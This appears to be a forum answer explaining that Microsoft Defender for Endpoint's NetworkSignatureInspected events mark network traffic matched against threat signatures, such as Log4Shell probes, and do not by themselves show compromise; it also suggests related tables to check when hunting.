NetworkSignatureInspected

NetworkSignatureInspected is not an execution or connection event. It’s a network inspection telemetry event generated when Microsoft Defender for Endpoint inspects network traffic against known threat signatures (including Zeek-based signatures and Microsoft threat intelligence patterns).

In simple terms, it means traffic was inspected and matched against a signature — not that the device executed or downloaded that content.

The AdditionalFields content you’re seeing is raw or partially decoded network payload that matched a detection signature. In your example, references like CVE-2021-44228, suspicious script fragments, Qakbot indicators, curl.exe strings, and obfuscated JavaScript strongly suggest this was traffic inspected for exploit or malware patterns (likely Log4Shell-related scanning or web-based delivery attempts).

A few important clarifications:

1. NetworkSignatureInspected does not mean successful exploitation. It means traffic matched a signature pattern.
2. If Defender reports no alerts and DeviceNetworkEvents or CommonSecurityLog show no corresponding outbound connections to those domains, this often indicates one of the following:
   • The traffic was blocked upstream.
   • It was passive inspection of inbound scanning traffic.
   • It was signature matching within encrypted or partially reconstructed traffic.
   • The content was embedded in payload inspection but never executed.
3. The presence of CVE-2021-44228 references is very common in internet-wide scanning activity. Many internet-facing services still receive automated exploit probes. If multiple devices show similar entries, it is very likely opportunistic scanning rather than targeted compromise.

The encoded and binary-like segments in AdditionalFields are typical of payload fragments captured during deep packet inspection. They are not meant to be human-readable logs; they are signature-matching artifacts.

If there are:

• No correlated DeviceProcessEvents (e.g., no suspicious child processes)
• No successful outbound connections to the referenced domains
• No Defender alerts tied to the event
• No abnormal authentication or lateral movement activity

Then this is most likely inspection of malicious or suspicious network content that did not result in execution or compromise.

In environments with internet exposure, especially web services, this type of telemetry is normal background noise from automated scanning and botnet activity.

If you want additional confidence, you can pivot on:

• RemoteIP from DeviceNetworkEvents
• Any matching AlertIds
• Correlated DeviceProcessEvents around the same timestamp
• DeviceFileEvents involving curl.exe or regsvr32

But based on what you’ve described, this aligns with expected inspection behavior rather than confirmed compromise.

That’s a really good and subtle observation, and what you’re seeing is actually expected behavior rather than evidence of an active compromise. As of December 2025, entries in DeviceTimeline (or Advanced Hunting) with ActionType = NetworkSignatureInspected are generated by the network inspection engine in Microsoft Defender for Endpoint (MDE). This engine integrates lightweight Zeek-based inspection telemetry into the endpoint sensor. These records represent passive detections of network-layer patterns that Defender recognized and analyzed, not necessarily blocked or executed payloads.

The AdditionalFields content you’re seeing is a raw snippet of payload data that matched a known network signature .. in your case, one related to CVE-2021-44228 (Log4Shell) and some strings commonly used by Qakbot or phishing scripts. Defender is flagging that pattern because its sensor saw traffic that resembled an exploit attempt, perhaps a malformed HTTP request or an external scan. It doesn’t mean the device executed malicious code or contacted those domains. The sensor simply captured the payload signature while inspecting inbound or outbound packets. The same pattern appearing across multiple devices confirms that it was a signature match from a scan or external probe, not a localized infection.

Because these network inspection events don’t always map to full detections, they don’t raise an alert or show up in Defender’s threat summary. They are primarily included to enrich hunting data and give you network visibility at the packet level. If you check the related device’s DeviceNetworkEvents, you likely won’t see any confirmed connections to those URLs because the request never completed or was intercepted at the inspection layer. The absence of alerts or follow-up activity means Defender treated it as benign background noise or blocked the traffic before any payload was delivered.

Basically NetworkSignatureInspected entries indicate that Defender’s network protection module analyzed traffic matching a known signature but didn’t find evidence of compromise. The payloads in the AdditionalFields are fragments of suspicious data observed on the wire, not code that executed on the device. They are useful for correlation and threat hunting but don’t require remediation unless accompanied by alerts or process execution events. Please hit like if you like the solution.